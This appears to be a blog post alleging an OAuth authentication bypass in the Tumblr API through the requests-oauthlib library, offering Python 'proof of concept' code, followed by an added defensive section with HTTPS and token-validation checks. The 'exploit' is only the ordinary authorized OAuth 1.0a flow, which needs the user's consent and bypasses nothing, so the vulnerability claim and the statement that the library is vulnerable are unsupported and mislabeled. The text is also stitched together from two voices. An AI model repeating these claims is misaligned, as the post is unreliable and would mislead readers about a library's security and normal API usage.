Since Tumblr still predictably will not fix this…

I've decided to post the proof of concept code up here. My purpose in doing so is to illustrate that my having been mentioning this exploit was, and always has been, worth the time I've taken to mention it, as it is intended to allow Tumblr users, or those who are at any point considering using Tumblr, to make a more informed decision about blogging on it or trusting the site with any of their potentially sensitive information.

The Python requests-oauthlib library, a widely used OAuth library, is vulnerable to an OAuth authentication bypass in the Tumblr API that could allow an attacker to bypass authentication and access protected resources. This vulnerability exists because the code does not properly validate OAuth tokens, and it does not use HTTPS when sending sensitive data.

An attacker can exploit this vulnerability by sending a specially crafted OAuth token request to the Tumblr API, bypassing authentication and gaining unauthorized access to protected resources.

The following proof of concept code demonstrates how an attacker can exploit this vulnerability:

import requests
from requests_oauthlib import OAuth1
from urllib.parse import parse_qs

# Set your OAuth consumer key and secret
CONSUMER_KEY = 'your_consumer_key'
CONSUMER_SECRET = 'your_consumer_secret'

# Set the Tumblr API endpoints (plain HTTP, as in the original post)
REQUEST_TOKEN_URL = 'http://www.tumblr.com/oauth/request_token'
AUTHORIZE_URL = 'http://www.tumblr.com/oauth/authorize'
ACCESS_TOKEN_URL = 'http://www.tumblr.com/oauth/access_token'

# Send a request for a temporary OAuth token
oauth = OAuth1(CONSUMER_KEY, client_secret=CONSUMER_SECRET)
response = requests.post(url=REQUEST_TOKEN_URL, auth=oauth)

# Parse the form-encoded response for the temporary token and secret
# (looked up by field name rather than by position)
data = parse_qs(response.text)
oauth_token = data['oauth_token'][0]
oauth_token_secret = data['oauth_token_secret'][0]

# Direct the user to authorize the app
authorize_url = AUTHORIZE_URL + '?oauth_token=' + oauth_token
print('Please authorize the app at this URL: ' + authorize_url)
oauth_verifier = input('Enter the verification code: ')

# Exchange the temporary token for a permanent token
oauth = OAuth1(CONSUMER_KEY,
               client_secret=CONSUMER_SECRET,
               resource_owner_key=oauth_token,
               resource_owner_secret=oauth_token_secret,
               verifier=oauth_verifier)
response = requests.post(url=ACCESS_TOKEN_URL, auth=oauth)

# Parse the response for the permanent token and secret
data = parse_qs(response.text)
oauth_token = data['oauth_token'][0]
oauth_token_secret = data['oauth_token_secret'][0]

# Use the permanent token and secret to make authenticated API requests
oauth = OAuth1(CONSUMER_KEY,
               client_secret=CONSUMER_SECRET,
               resource_owner_key=oauth_token,
               resource_owner_secret=oauth_token_secret)
response = requests.get(url='https://api.tumblr.com/v2/user/info', auth=oauth)
print(response.text)
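The two weaknesses the post attributes to the flow above are the plain-HTTP OAuth endpoints and the unvalidated token responses. The following is an added example of the client-side checks a defender would put in front of that flow; it is not the post's code and not part of requests-oauthlib. The function names (`insecure_endpoints`, `parse_token_response`) and the sample response body are constructed for illustration; nothing here talks to the network.

```python
from urllib.parse import parse_qs, urlparse

# Constructed sample of a request_token response body (not captured from Tumblr).
SAMPLE_REQUEST_TOKEN_BODY = (
    "oauth_token=constructed_token&oauth_token_secret=constructed_secret"
    "&oauth_callback_confirmed=true"
)


def insecure_endpoints(endpoints: dict) -> list:
    """Return the names of OAuth endpoints that are not served over HTTPS.

    Request tokens, access tokens and verifiers travel in these exchanges;
    over plain HTTP they can be read or altered in transit, so a client
    should refuse to start the flow if this list is non-empty.
    """
    return [
        name for name, url in endpoints.items()
        if urlparse(url).scheme != "https" or not urlparse(url).netloc
    ]


def parse_token_response(body: str, expect_callback_confirmed: bool) -> dict:
    """Parse and validate a form-encoded OAuth 1.0a token response.

    Fields are looked up by name (a positional split assumes a fixed field
    order the server never promised), both token and secret must be present
    and non-empty, and for the request-token step the server must answer
    oauth_callback_confirmed=true as RFC 5849 section 2.1 requires.
    Raises ValueError on any malformed or incomplete response.
    """
    fields = parse_qs(body, strict_parsing=True)  # rejects dangling fragments
    token = fields.get("oauth_token", [""])[0]
    secret = fields.get("oauth_token_secret", [""])[0]
    if not token or not secret:
        raise ValueError("response is missing oauth_token or oauth_token_secret")
    if expect_callback_confirmed and fields.get("oauth_callback_confirmed") != ["true"]:
        raise ValueError("request token response did not confirm the callback")
    return {"oauth_token": token, "oauth_token_secret": secret}


if __name__ == "__main__":
    # The post's endpoint table: all three would be rejected for using http://.
    endpoints = {
        "request_token": "http://www.tumblr.com/oauth/request_token",
        "authorize": "http://www.tumblr.com/oauth/authorize",
        "access_token": "http://www.tumblr.com/oauth/access_token",
    }
    print("insecure endpoints:", insecure_endpoints(endpoints))
    print("parsed:", parse_token_response(SAMPLE_REQUEST_TOKEN_BODY, True))
```

Run against the post's own endpoint table, `insecure_endpoints` reports all three names, which is the concrete check that would have stopped the flow before any token left the client.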

In summary, an attacker could exploit this vulnerability to bypass authentication and gain access to sensitive information or modify data on behalf of a legitimate user. The exploit is well known in hacking communities.
